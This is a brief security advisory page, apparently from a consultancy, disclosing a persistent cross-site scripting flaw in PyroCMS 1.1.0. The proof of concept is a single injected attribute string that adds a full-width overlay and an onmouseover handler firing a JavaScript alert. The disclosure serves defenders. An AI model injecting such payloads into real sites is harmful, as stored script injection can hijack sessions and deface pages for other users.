Home
Consulting
Advisories
Software
Articles
Contact

PyroCMS 1.1.0 Persistent Cross-site Scripting

Legacy Advisories

Description

A persistent cross-site scripting vulnerability in PyroCMS 1.1.0 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

"style="position:absolute;top:0;left:0;width:9999px;height:200px;"onmouseover="alert(0)


Copyright © 2018 AutoSec Tools LLC